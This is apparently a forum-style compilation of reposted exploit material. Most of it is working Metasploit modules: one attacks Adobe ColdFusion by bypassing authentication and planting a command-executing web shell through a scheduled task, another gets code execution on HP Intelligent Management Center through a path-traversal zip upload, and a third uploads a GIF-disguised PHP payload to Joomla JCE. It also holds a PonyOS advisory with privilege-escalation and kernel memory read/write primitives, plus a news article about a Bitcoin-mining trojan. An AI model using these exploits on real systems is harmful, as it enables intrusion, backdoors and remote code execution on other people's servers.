OptBool.new('DELETE_TASK', [ true, 'Delete scheduled task when done', true ]), ], self.class) end def check exploitable = 0 exploitable += 1 if check_cve_2013_0629 exploitable += 1 if check_cve_2013_0632 exploitable > 0 ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe end # Login any way possible, returning the cookies if successful, empty otherwise def login cf_cookies = {} ways = { 'RDS bypass' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], true) }, 'RDS login' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], false) }, 'Administrator login' => Proc.new { |foo| administrator_login(datastore['USERNAME'], datastore['PASSWORD']) }, } ways.each do |what, how| these_cookies = how.call if got_auth? these_cookies print_status "Authenticated using '#{what}' technique" cf_cookies = these_cookies break end end fail_with(Exploit::Failure::NoAccess, "Unable to authenticate") if cf_cookies.empty? cf_cookies end def exploit # login cf_cookies = login # if we managed to login, get the listener ready datastore['URIPATH'] = rand_text_alphanumeric(6) srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}" start_service # drop a payload on disk which we can used to execute # arbitrary commands, which will be needed regardless of # which technique (cmd, payload) the user wants input_exec = srv_uri + "/#{datastore['URIPATH']}-e" output_exec = "#{datastore['URIPATH']}-e.cfm" schedule_drop cf_cookies, input_exec, output_exec if datastore['CMD'] and not datastore['CMD'].empty? # now that the coldfusion exec is on disk, execute it, # passing in the command and arguments parts = datastore['CMD'].split(/\s+/) res = execute output_exec, parts.shift, parts.join(' ') print_line res.body.strip else # drop the payload input_payload = srv_uri + "/#{datastore['URIPATH']}-p" output_payload = "#{datastore['URIPATH']}-p" schedule_drop cf_cookies, input_payload, output_payload # make the payload executable # XXX: windows? execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}" # execute the payload execute output_exec, "../../wwwroot/CFIDE/#{output_payload}" end handler end def execute cfm, cmd, args='' uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}" send_request_raw( { 'uri' => uri, 'method' => 'GET' }, 25 ) end def on_new_session(client) return # TODO: cleanup if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") @files.each do |file| client.fs.file.rm("#{file}") end else @files.each do |file| client.shell_command_token("rm #{file}") end end end def on_request_uri cli, request cf_payload = "test" case request.uri when "/#{datastore['URIPATH']}-e" cf_payload = <<-EOF <cfparam name="url.cmd" type="string" default="id"/> <cfparam name="url.args" type="string" default=""/> <cfexecute name=#url.cmd# arguments=#url.args# timeout="5" variable="output" /> <cfoutput>#output#</cfoutput> EOF when "/#{datastore['URIPATH']}-p" cf_payload = payload.encoded end send_response(cli, cf_payload, { 'Content-Type' => 'text/html' }) end # Given a hash of cookie key value pairs, return a string # suitable for use as an HTTP Cookie header def build_cookie_header cookies cookies.to_a.map { |a| a.join '=' }.join '; ' end # this doesn't actually work def twiddle_csrf cookies, enable=false mode = (enable ? "Enabling" : "Disabling") print_status "#{mode} CSRF protection" params = { 'SessEnable' => enable.to_s, } res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies), 'vars_post' => params, }) if res if res.body =~ /SessionManagement should/ print_error "Error #{mode} CSRF" end else print_error "No response while #{mode} CSRF" end end # Using the provided +cookies+, schedule a ColdFusion task # to request content from +input_uri+ and drop it in +output_path+ def schedule_drop cookies, input_uri, output_path vprint_status "Attempting to schedule ColdFusion task" cookie_hash = cookies scheduletasks_path = "/CFIDE/administrator/scheduler/scheduletasks.cfm" scheduleedit_path = "/CFIDE/administrator/scheduler/scheduleedit.cfm" # make a request to the scheduletasks page to pick up the CSRF token res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path), 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) cookie_hash.merge! get_useful_cookies res if res # XXX: I can only seem to get this to work if 'Enable Session Variables' # is disabled (Server Settings -> Memory Variables) token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first unless token print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)" #twiddle_csrf cookies, false token = '' end else fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for task listing") end # make a request to the scheduletasks page again, this time passing in our CSRF token # in an attempt to get all of the other cookies used in a request cookie_hash.merge! get_useful_cookies res res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?csrftoken=#{token}&submit=Schedule+New+Task", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for new task") unless res # pick a unique task ID task_id = SecureRandom.uuid # drop the backdoor in the CFIDE directory so it can be executed publish_file = '../../wwwroot/CFIDE/' + output_path # pick a start date. This must be in the future, so pick # one sufficiently far ahead to account for time zones, # improper time keeping, solar flares, drift, etc. start_date = "03/15/#{Time.now.strftime('%Y').to_i + 1}" params = { 'csrftoken' => token, 'TaskName' => task_id, 'Group' => 'default', 'Start_Date' => start_date, 'End_Date' => '', 'ScheduleType' => 'Once', 'StartTimeOnce' => '1:37 PM', 'Interval' => 'Daily', 'StartTimeDWM' => '', 'customInterval_hour' => '0', 'customInterval_min' => '0', 'customInterval_sec' => '0', 'CustomStartTime' => '', 'CustomEndTime' => '', 'repeatradio' => 'norepeatforeverradio', 'Repeat' => '', 'crontime' => '', 'Operation' => 'HTTPRequest', 'ScheduledURL' => input_uri, 'Username' => '', 'Password' => '', 'Request_Time_out' => '', 'proxy_server' => '', 'http_proxy_port' => '', 'publish' => '1', 'publish_file' => publish_file, 'publish_overwrite' => 'on', 'eventhandler' => '', 'exclude' => '', 'onmisfire' => '', 'onexception' => '', 'oncomplete' => '', 'priority' => '5', 'retrycount' => '3', 'advancedmode' => 'true', 'adminsubmit' => 'Submit', 'taskNameOriginal' => task_id, 'groupOriginal' => 'default', 'modeOriginal' => 'server', } cookie_hash.merge! (get_useful_cookies res) res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), 'vars_post' => params, }) if res # if there was something wrong with the task, capture those errors # print them and abort errors = res.body.scan(/<li class="errorText">(.*)<\/li>/i).flatten if errors.empty? if res.body =~ /SessionManagement should/ fail_with(Exploit::Failure::NoAccess, "Unable to bypass CSRF") end print_status "Created task #{task_id}" else fail_with(Exploit::Failure::NoAccess, "Unable to create task #{task_id}: #{errors.join(',')}") end else fail_with(Exploit::Failure::Unknown, "No response when creating task #{task_id}") end print_status "Executing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) #twiddle_csrf cookies, true if datastore['DELETE_TASK'] print_status "Removing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) end vprint_status normalize_uri(target_uri, publish_file) publish_file end # Given the HTTP response +res+, extract any interesting, non-empty # cookies, returning them as a hash def get_useful_cookies res set_cookie = res.headers['Set-Cookie'] # Parse the Set-Cookie header parsed_cookies = CGI::Cookie.parse(set_cookie) # Clean up the cookies we got by: # * Dropping Path and Expires from the parsed cookies -- we don't care # * Dropping empty (reset) cookies %w(Path Expires).each do |ignore| parsed_cookies.delete ignore parsed_cookies.delete ignore.downcase end parsed_cookies.keys.each do |name| parsed_cookies[name].reject! { |value| value == '""' } end parsed_cookies.reject! { |name,values| values.empty? } # the cookies always seem to start with CFAUTHORIZATION_, but # give the module the ability to log what it got in the event # that this stops becoming an OK assumption unless parsed_cookies.empty? vprint_status "Got the following cookies after authenticating: #{parsed_cookies}" end cookie_pattern = /^CF/ useful_cookies = parsed_cookies.select { |name,value| name =~ cookie_pattern } if useful_cookies.empty? vprint_status "No #{cookie_pattern} cookies found" else vprint_status "The following cookies could be used for future authentication: #{useful_cookies}" end useful_cookies end # Authenticates to ColdFusion Administrator via the adminapi using the # specified +user+ and +password+. If +use_rds+ is true, it is assumed that # the provided credentials are for RDS, otherwise they are assumed to be # credentials for ColdFusion Administrator. # # Returns a hash (cookie name => value) of the cookies obtained def adminapi_login user, password, use_rds vprint_status "Attempting ColdFusion Administrator adminapi login" user ||= '' password ||= '' res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => { 'method' => 'login', 'adminUserId' => user, 'adminPassword' => password, 'rdsPasswordAllowed' => (use_rds ? '1' : '0') } }) if res if res.code == 200 vprint_status "HTTP #{res.code} when authenticating" return get_useful_cookies(res) else print_error "HTTP #{res.code} when authenticating" end else print_error "No response when authenticating" end {} end # Authenticates to ColdFusion Administrator using the specified +user+ and # +password+ # # Returns a hash (cookie name => value) of the cookies obtained def administrator_login user, password cf_cookies = administrator_9x_login user, password unless got_auth? cf_cookies cf_cookies = administrator_10x_login user, password end cf_cookies end def administrator_10x_login user, password # coldfusion 10 appears to do: # cfadminPassword.value = hex_sha1(cfadminPassword.value) vprint_status "Trying ColdFusion 10.x Administrator login" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'cfadminUserId' => user, 'cfadminPassword' => Digest::SHA1.hexdigest(password).upcase, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'submit' => 'Login', } }) if res if res.code.to_s =~ /^30[12]/ useful_cookies = get_useful_cookies res if got_auth? useful_cookies return useful_cookies end else if res.body =~ /<title>Error/i print_status "Appears to be restricted and/or not ColdFusion 10.x" elsif res.body =~ /A License exception has occurred/i print_status "Is license restricted" else vprint_status "Got unexpected HTTP #{res.code} response when sending a ColdFusion 10.x request. Not 10.x?" vprint_status res.body end end end return {} end def got_auth? cookies not cookies.select { |name,values| name =~ /^CFAUTHORIZATION_/ }.empty? end def administrator_9x_login user, password vprint_status "Trying ColdFusion 9.x Administrator login" # coldfusion 9 appears to do: # cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value)); # # You can get a current salt from # http://<host>:8500/CFIDE/adminapi/administrator.cfc?method=getSalt&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc#method_getSalt # # Unfortunately that URL might be restricted and the salt really just looks # to be the current time represented as the number of milliseconds since # the epoch, so just use that salt = (Time.now.to_i * 1000).to_s pass = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), salt, Digest::SHA1.hexdigest(password).upcase).upcase res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'submit' => 'Login', 'salt' => salt, 'cfadminUserId' => user, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'cfadminPassword' => pass, } }) if res return get_useful_cookies res else print_error "No response while trying ColdFusion 9.x authentication" end {} end # Authenticates to ColdFusion ComponentUtils using the specified +user+ and +password+ # # Returns a hash (cookie name => value) of the cookies obtained def componentutils_login user, password vprint_status "Attempting ColdFusion ComponentUtils login" vars = { 'j_password_required' => "Password+Required", 'submit' => 'Login', } vars['rdsUserId'] = user if user vars['j_password'] = password if password res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE componentutils cfcexplorer.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => vars }) cf_cookies = {} if res.code.to_s =~ /^(?:200|30[12])$/ cf_cookies = get_useful_cookies res else print_error "HTTP #{res.code} while attempting ColdFusion ComponentUtils login" end cf_cookies end def check_cve_2013_0629 vulns = 0 paths = %w(../../../license.txt ../../../../license.html) # first try password-less bypass in the event that this thing # was just wide open vuln_without_creds = false paths.each do |path| if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_creds = true break end end if vuln_without_creds print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 without credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 without credentials" end # if credentials are provided, try those too if datastore['USERNAME'] and datastore['PASSWORD'] vuln_without_bypass = false paths.each do |path| cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_bypass = true break end end if vuln_without_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 with credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 with credentials" end end # now try with the CVE-2013-0632 bypass, in the event that this wasn't *totally* wide open vuln_with_bypass = false paths.each do |path| cf_cookies = adminapi_login datastore['USERNAME'], datastore['PASSWORD'], true # we need to take the cookie value from CFAUTHORIZATION_cfadmin # and use it for CFAUTHORIZATION_componentutils cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies.delete 'CFAUTHORIZATION_cfadmin' if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_with_bypass = true break end end if vuln_with_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" end vulns > 0 end # Checks for CVE-2013-0632, returning true if the target is # vulnerable, false otherwise def check_cve_2013_0632 if datastore['USERDS'] # the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # subsequently *enabled* after install, the password is unset so we simply must # check that and only that. cf_cookies = adminapi_login 'foo', 'bar', true if cf_cookies.empty? print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" else print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0632" return true end else print_error "Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off" end false end def traverse_read path, cookies uri = normalize_uri(target_uri.path) uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << path res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies) }) res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') end end Sursa: Adobe ColdFusion APSB13-03 Remote Exploit
-
PonyOS version 0.499-mlp suffers from privilege escalation due to the cat binary being executed with escalated privileges and file permissions do not work. It also has a kernel compromise vulnerability. Advisory: PonyOS Security Issues John Cartwright <johnc@grok.org.uk> Introduction ------------ Like countless others, I was pretty excited about PonyOS yesterday (April 1st 2013) and decided to give it a go. After wasting a lot of time nyan'ing, I knew this was the future of desktop OSes. However, I wondered how secure PonyOS really was. So, I took a look at the source, which revealed that our ponies may be in danger of compromise! All bugs tested against PonyOS 0.4.99-mlp from ponyos.org. Userland Compromise ------------------- Take a look at this snippet from login.c: int uid = checkUserPass(username, password); if (uid < 0) { fprintf(stdout, "\nLogin failed.\n"); continue; } system("cat /etc/motd"); pid_t pid = getpid(); uint32_t f = fork(); if (getpid() != pid) { /* TODO: Read appropriate shell from /etc/passwd */ set_username(); set_homedir(); set_path(); char * args[] = { "/bin/sh", NULL }; syscall_setuid(uid); int i = execvp(args[0], args); It seems that login runs 'cat' before dropping privileges. This is easy to exploit, given that the file permissions don't work. Just log in as 'local', and replace the 'cat' binary with another ELF - 'whoami' will do nicely for a PoC. Then log out, and back in again. This causes your binary to run as uid 0. Exciting stuff! Kernel Compromise ----------------- Obviously userland exploits are boring and it was important that I find some kernel holes to play with. Luckily PonyOS has quite a few for your enjoyment. You can abuse syscall_fstat() to write the contents of the stat buf to an arbitrary kernel location if you so wish. There are a few other similar bugs where pointers aren't sanitised, too. static int stat(int fd, uint32_t st) { if (fd >= (int)current_process->fds->length || fd < 0) { return -1; } fs_node_t * fn = current_process->fds->entries[fd]; struct stat * f = (struct stat *)st; f->st_dev = 0; f->st_ino = fn->inode; ... f->st_mode = fn->mask | flags; f->st_nlink = 0; f->st_uid = fn->uid; f->st_gid = fn->gid; f->st_rdev = 0; f->st_size = fn->length; This is all well and good, but for today's silliness^h^h^h^h^h^h^h^h^himportant security audit I decided to exploit the ioctl handler found in tty.c: int pty_ioctl(pty_t * pty, int request, void * argp) { debug_print(WARNING, "Incoming IOCTL request %d", request); switch (request) { case TIOCSWINSZ: debug_print(WARNING, "Setting!"); memcpy(&pty->size, argp, sizeof(struct winsize)); /* TODO send sigwinch to fg_prog */ return 0; case TIOCGWINSZ: memcpy(argp, &pty->size, sizeof(struct winsize)); return 0; default: return -1; /* TODO EINV... something or other */ } return -1; } Printing WARNING to the console is fine, but the ponies won't get the message. What we have here is pretty much an arbitrary read/write of kernel memory. Want to read the value of 0x11223344 ? struct winsize ws; ioctl(0, TIOCSWINSZ, (void *)0x11223344); ioctl(0, TIOCGWINSZ, &ws); printf("%x %x %x %x\n", ws.ws_col, ws.ws_row, ws.ws_xpixel, ws.ws_ypixel); Want to zero the memory at that address? struct winsize ws; memset(&ws, '\0', sizeof(struct winsize)); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x11223344); Using these two primitives it is possible to dump out a large chunk of the kernel memory, find the process list, user_t, etc and patch it appropriately to change your uid. There's a screenshot of an exploit in action at: http://www.grok.org.uk/advisories/findus.jpg However, the 'findus' code is not 'stable' enough to share right now. Mitigating Factors ------------------ PonyOS doesn't come with a compiler, or any remote access, so it is quite difficult to exploit unless you build your exploit code into the OS image. Having said that, there are some other bugs that could help you if you really wanted to attack PonyOS, given command line access. For example, there is a perfectly good format string bug in the shell: for (int i = 0; i < shell_commands_len; ++i) { if (strstr(shell_commands[i], argv[0]) == shell_commands[i]) { list_insert(matches, shell_commands[i]); match = shell_commands[i]; } } if (matches->length == 0) { list_free(matches); return; } else if (matches->length == 1) { for (int j = 0; j < strlen(context->buffer); ++j) { printf("\010 \010"); } printf(match); This can be triggered by going into /bin and creating an empty file called (for example) %08x%08x. Perhaps you could use the excellent 'bim' editor for this task. Then, re-execute the shell, and use the tab-completion functionality to trigger the format string bug. Just a few short pony-sized steps to go from there to injecting arbitrary code to exploit the system call issues. Alternatively you might want to pass an invalid TERM to nyancat: char * nterm = getenv("TERM"); if (nterm) { strcpy(term, nterm); } Unfortunately the only way I could find to set this value was the shell's 'export' builtin, and long lines crash the shell (512 byte buffer...) so I haven't played with that bug yet, or indeed this other crash. Conclusion ---------- There's so much to see and do! I don't think PonyOS will be replacing my other systems anytime soon, but it is an interesting project worthy of your attention. I mean, it has ponies *and* massive security holes! What's not to like? In all seriousness I accept the fact that the OS isn't meant to be secure in any way and I have essentially wasted 24 hours of my life horsing around with it. Sursa: PonyOS 0.4.99-mlp Privilege Escalation ? Packet Storm
-
Maybe it’s a sign of the Bitcoin bubble. Criminals are trying to take control of PCs and turn them into Bitcoin miners. According to antivirus seller Kaspersky Lab, there’s a new Trojan — spotted just yesterday and spreading via Skype — that takes control of infected machines and forces them to do known as Bitcoin mining, a way of earning digital currency. The Bitcoin digital currency system rewards miners (in Bitcoins, natch) for their number-crunching work, which is essential to keeping the anonymous Bitcoin currency system working. With the Trojan, hackers are forcing others’ machines to earn them money, and it can really put a strain on these machines. Victims might notice that their CPU usage shoots sky high. Yesterday, the Trojan was spreading via Skype messages. In one Spanish message obtained by Kaspersky, the Trojan was supposed to be a “favorite” picture of the victim. About two thousand people per hour were clicking on the website hosting the Trojan software, Kaspersky said. “Most of potential victims live in Italy then Russia, Poland, Costa Rica, Spain, Germany, Ukraine and others,” Kaspersky Researcher Dmitry Bestuzhev wrote in a blog post. Once computer criminals have tricked you into downloading a Trojan, they have control of your computer, and there are a lot of things they could do. And the Trojan isn’t only used for Bitcoin mining, Kaspersky says. This isn’t the first time a Bitcoin mining Trojan has popped up, and malicious software that flat-out steals bitcoins has been around for years. Two years ago, Symantec spotted a Trojan — called Badminer — that sniffed out graphical processing units and used them to crank out bitcoins. A regular PC wouldn’t be able to do much Bitcoin mining on its own, but hackers could pretty easily register a group of compromised computers with a specific Bitcoin mining pool and point all of the systems there, according to Charlie Shrem, the founder of Bitcoin payment processor Bitinstant. “If he infiltrates a million computers, then it will pay off,” he said in an email message. Bitcoins have been on a price surge lately. Right now, they’re trading at about $140, about ten times their value at the end of last year. Maybe that makes mining a little more attractive to the bad guys. Sursa: Trojan Turns Your PC Into Bitcoin Mining Slave | Wired Enterprise | Wired.com
-
HP Intelligent Management Center Arbitrary File Upload HP Intelligent Management Center Arbitrary File Upload Posted Mar 26, 2013 Authored by rgod, juan vazquez | Site metasploit.com This Metasploit module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This Metasploit module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-5201' ], [ 'OSVDB', '91026' ], [ 'BID', '58385' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 07 2013')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), 'method' => 'GET' }) if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" # New lines are handled on the vuln app and payload is corrupted jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # Zipping with CM_STORE to avoid errors while zip decompressing # on the Java vulnerable application zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) post_data = Rex::MIME::Message.new post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") print_status("#{@peer} - Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" }) if res and res.code == 200 and res.body.empty? print_status("#{@peer} - JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") end print_status("#{@peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' }) end end Sursa: HP Intelligent Management Center Arbitrary File Upload ? Packet Storm
-
Joomla Component JCE File Upload Remote Code Execution This Metasploit module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This Metasploit module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Joomla Component JCE File Upload Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26. }, 'Author' => [ 'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC 'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['BID', '49338'], ['EDB', '17734'] ], 'Payload' => { 'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long) 'DisableNops' => true, 'BadChars' => "#", 'Keys' => ['php'] }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => 'Aug 2 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "Joomla directory path", "/"]) ], self.class) end def get_version # check imgmanager version @uri_base = normalize_uri(target_uri.path.to_s, 'index.php') @vars_get_base = { 'option'=> 'com_jce', 'task' => 'plugin', 'plugin'=> 'imgmanager', 'file' => 'imgmanager' } print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ 'uri' => @uri_base, 'vars_get' => @vars_get_base, 'method' => 'GET', 'version' => '1.1' }) version = nil if (res and res.code == 200) res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<}) version = $1.nil? ? nil : $1 end return version end def check version = ( get_version || '').to_s if (version.match(%r{1\.5\.7\.1[0-4]?})) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def upload_gif # add GIF header cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>" # Generate some random strings @payload_name = rand_text_alpha_lower(6) boundary = '-' * 27 + rand_text_numeric(11) parms = {'method'=> 'form'} parms.merge!(@vars_get_base) # POST data post_data = Rex::MIME::Message.new post_data.bound = boundary post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"") post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"") post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"") post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"") post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"") post_data.add_part("upload", nil, nil, "form-data; name=\"action\"") data = post_data.to_s res = send_request_cgi({ 'uri' => @uri_base, 'vars_get' => parms, 'method' => 'POST', 'version' => '1.1', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if (res and res.code = 200 ) return :access_denied if (res.body =~ /RESTRICTED/i) print_good("Successfully uploaded #{@payload_name}.gif") else print_error("Error uploading #{@payload_name}.gif") return :abort end return :success end def renamed? # Rename the file from .gif to .php data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}" print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php") res = send_request_cgi( { 'uri' => @uri_base, 'vars_get' => @vars_get_base, 'method' => 'POST', 'version' => '1.1', 'data' => data, 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8', 'headers' => { 'X-Request' => 'JSON' } }) if (res and res.code == 200 ) print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php") return true else print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php") return false end end def call_payload payload = "#{@payload_name}.php" print_status("Calling payload: #{payload}") uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'version' => '1.1' }) end def exploit return if not check == Exploit::CheckCode::Vulnerable if upload_gif == :success if renamed? register_files_for_cleanup("#{@payload_name}.php") call_payload end end end end Sursa: Joomla Component JCE File Upload Remote Code Execution ? Packet Storm
-
